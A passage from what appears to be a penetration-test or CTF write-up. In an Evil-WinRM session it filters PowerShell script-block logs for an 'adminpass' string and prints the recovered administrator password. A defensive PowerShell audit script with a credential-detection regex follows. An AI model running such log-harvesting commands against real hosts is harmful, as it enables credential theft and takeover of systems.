Event Log
It has been identified that the current user is part of the Event Log Reader group on the compromised host.
Additionally, PEAS was able to read some of the sensitive event logs.
*Evil-WinRM* PS C:\Users\scripting\Documents> Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational';ID=4104} | Select-Object TimeCreated,Id,@{n='Script';e={$_.Properties[2].Value}} | Format-Table -Wrap -AutoSize | findstr "adminpass"
$adminpass = 'TheShellIsMightierThanTheSword!'
net user administrator $adminpass /Y
[System.String]$Content = $adminpass
The password of the administrator account has been identified: TheShellIsMightierThanTheSword!
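From the defender's side, the same exposure can be audited on a host. The following is an added example, not part of the original write-up: it lists who holds Event Log Readers membership, checks whether Protected Event Logging is configured, and flags logged script blocks that assign a string literal to a credential-like variable, reporting only metadata. The function name, the regex, and the assumption that the host is a member server or workstation with the LocalAccounts module are mine.

```powershell
# Added audit example (not from the original write-up). Run elevated on the host under review.
# Assumption: member server or workstation where the LocalAccounts module is available.

function Get-ScriptBlockSecretExposure {
    param(
        # Constructed pattern: credential-like variable name assigned a string literal.
        [string]$Pattern = '\$(\w*(pass|pwd|secret|token|key)\w*)\s*=\s*[''"]',
        [int]$MaxEvents = 5000
    )

    # 1. Who can read the logs? S-1-5-32-573 is the well-known SID of BUILTIN\Event Log Readers.
    $readers = Get-LocalGroupMember -SID 'S-1-5-32-573' -ErrorAction SilentlyContinue |
        Select-Object -ExpandProperty Name

    # 2. Is Protected Event Logging (CMS encryption of script block text) set by policy?
    $pelKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\EventLog\ProtectedEventLogging'
    $pel = Get-ItemProperty -Path $pelKey -ErrorAction SilentlyContinue
    $protected = [bool]($pel -and $pel.EnableProtectedEventLogging -eq 1)

    # 3. Which logged script blocks embed a credential? Emit metadata only, never the value.
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    $hits = Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = [string]$_.Properties[2].Value        # ScriptBlockText
            $m = [regex]::Match($text, $Pattern, 'IgnoreCase')
            if ($m.Success) {
                [pscustomobject]@{
                    TimeCreated = $_.TimeCreated
                    UserSid     = $_.UserId
                    ScriptPath  = $_.Properties[4].Value   # empty for interactive input
                    Variable    = '$' + $m.Groups[1].Value # variable name only
                }
            }
        }

    [pscustomobject]@{
        EventLogReaders       = $readers
        ProtectedEventLogging = $protected
        ExposedScriptBlocks   = @($hits)
    }
}

$report = Get-ScriptBlockSecretExposure
$report | Format-List EventLogReaders, ProtectedEventLogging
$report.ExposedScriptBlocks | Sort-Object TimeCreated | Format-Table -AutoSize
```

Any row in ExposedScriptBlocks means the credential should be rotated and the script changed so it no longer embeds the secret; the broad regex will also produce some false positives that need manual review.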
Moving on to the Privilege Escalation phase.